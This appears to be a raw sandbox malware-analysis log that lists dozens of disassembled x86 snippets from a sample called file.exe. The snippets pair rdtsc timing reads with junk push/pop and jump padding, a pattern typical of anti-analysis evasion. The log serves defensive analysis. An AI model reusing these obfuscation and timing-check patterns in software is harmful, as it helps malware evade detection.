Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A26 second address: 4D80A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A35 second address: 4D80A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A39 second address: 4D80A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A3F second address: 4D80A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1A796F354Ch 0x00000013 or ch, 00000038h 0x00000016 jmp 00007F1A796F354Bh 0x0000001b popfd 0x0000001c mov bx, ax 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1A796F3551h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80BEE second address: 4D80C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1A796B9BF4h 0x0000000a sbb cx, A858h 0x0000000f jmp 00007F1A796B9BEBh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 lea eax, dword ptr [ebx+78h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F1A796B9BF4h 0x00000021 sbb al, FFFFFFB8h 0x00000024 jmp 00007F1A796B9BEBh 0x00000029 popfd 0x0000002a push ecx 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d pop ebx 0x0000002e popad 0x0000002f push 00000001h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov eax, edi 0x00000036 mov edi, 4B2D0A8Ah 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D53 second address: 4D80D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D57 second address: 4D80D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D5B second address: 4D80D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D61 second address: 4D80D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D67 second address: 4D80D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D6B second address: 4D80D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D6F second address: 4D80DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007F1A796F354Ah 0x0000000f test edi, edi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1A796F354Eh 0x00000018 and eax, 1A830018h 0x0000001e jmp 00007F1A796F354Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F1A796F3558h 0x0000002a xor ax, 6A78h 0x0000002f jmp 00007F1A796F354Bh 0x00000034 popfd 0x00000035 popad 0x00000036 js 00007F1AE9771E2Dh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1A796F3550h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DEC second address: 4D80DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DF0 second address: 4D80DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DF6 second address: 4D80DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DFC second address: 4D80E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E00 second address: 4D80E18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1A796B9BEBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E18 second address: 4D80E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 57AAh 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+08h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1A796F354Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E3A second address: 4D80E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E40 second address: 4D80E69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1A796F354Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E69 second address: 4D80E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E6D second address: 4D80E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E73 second address: 4D80E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E79 second address: 4D80F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b mov ch, 60h 0x0000000d pushfd 0x0000000e jmp 00007F1A796F3557h 0x00000013 jmp 00007F1A796F3553h 0x00000018 popfd 0x00000019 popad 0x0000001a nop 0x0000001b pushad 0x0000001c push ecx 0x0000001d movsx edi, ax 0x00000020 pop ecx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F1A796F3559h 0x00000028 nop 0x00000029 jmp 00007F1A796F354Eh 0x0000002e lea eax, dword ptr [ebp-18h] 0x00000031 pushad 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F1A796F354Ch 0x00000039 and ax, 7D78h 0x0000003e jmp 00007F1A796F354Bh 0x00000043 popfd 0x00000044 call 00007F1A796F3558h 0x00000049 pop eax 0x0000004a popad 0x0000004b pushfd 0x0000004c jmp 00007F1A796F354Bh 0x00000051 sub esi, 3EE489EEh 0x00000057 jmp 00007F1A796F3559h 0x0000005c popfd 0x0000005d popad 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F1A796F3558h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F6B second address: 4D80F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F71 second address: 4D80F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796F354Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F82 second address: 4D80F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F86 second address: 4D80FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, CE99h 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F1A796F3554h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81067 second address: 4D8106D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8106D second address: 4D810C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e jmp 00007F1A796F354Eh 0x00000013 mov ecx, esi 0x00000015 jmp 00007F1A796F3550h 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F1A796F3550h 0x00000022 mov edx, 74E806ECh 0x00000027 pushad 0x00000028 mov eax, 50E93C9Dh 0x0000002d push eax 0x0000002e push edx 0x0000002f mov edi, esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810C5 second address: 4D811A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub eax, eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1A796B9BF7h 0x00000013 adc ax, 8A6Eh 0x00000018 jmp 00007F1A796B9BF9h 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1A796B9BEEh 0x00000025 jmp 00007F1A796B9BF5h 0x0000002a popfd 0x0000002b call 00007F1A796B9BF0h 0x00000030 pop ecx 0x00000031 popad 0x00000032 popad 0x00000033 lock cmpxchg dword ptr [edx], ecx 0x00000037 pushad 0x00000038 mov si, dx 0x0000003b mov cx, dx 0x0000003e popad 0x0000003f pop edi 0x00000040 jmp 00007F1A796B9BF5h 0x00000045 test eax, eax 0x00000047 jmp 00007F1A796B9BEEh 0x0000004c jne 00007F1AE973813Fh 0x00000052 pushad 0x00000053 mov esi, 2D1D136Dh 0x00000058 mov ch, 79h 0x0000005a popad 0x0000005b mov edx, dword ptr [ebp+08h] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F1A796B9BF0h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D811A7 second address: 4D811BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D811BD second address: 4D811C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D811C2 second address: 4D81201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, 37F3h 0x00000013 pushfd 0x00000014 jmp 00007F1A796F3558h 0x00000019 or eax, 37B72CF8h 0x0000001f jmp 00007F1A796F354Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81201 second address: 4D81253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1A796B9BEFh 0x00000009 xor ax, 20BEh 0x0000000e jmp 00007F1A796B9BF9h 0x00000013 popfd 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esi+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1A796B9BF4h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81253 second address: 4D81262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81262 second address: 4D8129E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1A796B9BEFh 0x00000009 jmp 00007F1A796B9BF3h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [edx+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1A796B9BEBh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8129E second address: 4D812A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D812A4 second address: 4D812A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D812A8 second address: 4D81302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+08h] 0x0000000e jmp 00007F1A796F3556h 0x00000013 mov dword ptr [edx+08h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1A796F354Dh 0x0000001f add ecx, 6F587076h 0x00000025 jmp 00007F1A796F3551h 0x0000002a popfd 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81302 second address: 4D8131F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8131F second address: 4D81323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81323 second address: 4D81348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b jmp 00007F1A796B9BEDh 0x00000010 mov dword ptr [edx+0Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bh, C3h 0x00000018 mov si, 014Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81348 second address: 4D8136E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BA72h 0x00000007 jmp 00007F1A796F3553h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8136E second address: 4D81374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81374 second address: 4D8137A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8137A second address: 4D8146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+10h], eax 0x0000000b jmp 00007F1A796B9BF0h 0x00000010 mov eax, dword ptr [esi+14h] 0x00000013 pushad 0x00000014 jmp 00007F1A796B9BEEh 0x00000019 pushfd 0x0000001a jmp 00007F1A796B9BF2h 0x0000001f sub esi, 45D93E48h 0x00000025 jmp 00007F1A796B9BEBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [edx+14h], eax 0x0000002f jmp 00007F1A796B9BF6h 0x00000034 mov eax, dword ptr [esi+18h] 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F1A796B9BEEh 0x0000003e and cx, 63D8h 0x00000043 jmp 00007F1A796B9BEBh 0x00000048 popfd 0x00000049 jmp 00007F1A796B9BF8h 0x0000004e popad 0x0000004f mov dword ptr [edx+18h], eax 0x00000052 pushad 0x00000053 mov dx, ax 0x00000056 movzx eax, bx 0x00000059 popad 0x0000005a mov eax, dword ptr [esi+1Ch] 0x0000005d jmp 00007F1A796B9BF5h 0x00000062 mov dword ptr [edx+1Ch], eax 0x00000065 pushad 0x00000066 pushfd 0x00000067 jmp 00007F1A796B9BECh 0x0000006c xor eax, 4BFE67C8h 0x00000072 jmp 00007F1A796B9BEBh 0x00000077 popfd 0x00000078 push eax 0x00000079 push edx 0x0000007a mov cl, 57h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8146D second address: 4D81494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+20h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1A796F3559h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81494 second address: 4D81498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81498 second address: 4D8149E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8149E second address: 4D814A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D814A4 second address: 4D814A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D814A8 second address: 4D81546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b jmp 00007F1A796B9BF2h 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 jmp 00007F1A796B9BF0h 0x00000018 mov dword ptr [edx+24h], eax 0x0000001b pushad 0x0000001c mov cx, 143Dh 0x00000020 pushfd 0x00000021 jmp 00007F1A796B9BEAh 0x00000026 xor ecx, 6E2E7218h 0x0000002c jmp 00007F1A796B9BEBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+28h] 0x00000036 jmp 00007F1A796B9BF6h 0x0000003b mov dword ptr [edx+28h], eax 0x0000003e jmp 00007F1A796B9BF0h 0x00000043 mov ecx, dword ptr [esi+2Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F1A796B9BF7h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81546 second address: 4D8154C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8154C second address: 4D81550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81550 second address: 4D815A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1A796F3558h 0x00000014 and esi, 18F1E868h 0x0000001a jmp 00007F1A796F354Bh 0x0000001f popfd 0x00000020 jmp 00007F1A796F3558h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D815A2 second address: 4D815A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D815A8 second address: 4D815AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D815AC second address: 4D815C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D815C0 second address: 4D81605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1A796F354Dh 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [edx+30h], ax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F1A796F3554h 0x0000001b or si, 6F88h 0x00000020 jmp 00007F1A796F354Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81605 second address: 4D8160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8160A second address: 4D81610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81610 second address: 4D81614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81614 second address: 4D81618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81618 second address: 4D81637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1A796B9BEFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81637 second address: 4D8163B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8163B second address: 4D81641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81641 second address: 4D81674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 jmp 00007F1A796F354Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [edx+32h], ax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1A796F3557h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81674 second address: 4D8167A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8167A second address: 4D8167E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8167E second address: 4D81682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81682 second address: 4D816D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1A796F354Dh 0x00000012 add ax, 9016h 0x00000017 jmp 00007F1A796F3551h 0x0000001c popfd 0x0000001d mov ax, BA87h 0x00000021 popad 0x00000022 mov dword ptr [edx+34h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1A796F3559h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D816D6 second address: 4D816F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1A796B9BF7h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D816F3 second address: 4D81706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test ecx, 00000700h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81706 second address: 4D8170A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8170A second address: 4D81710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
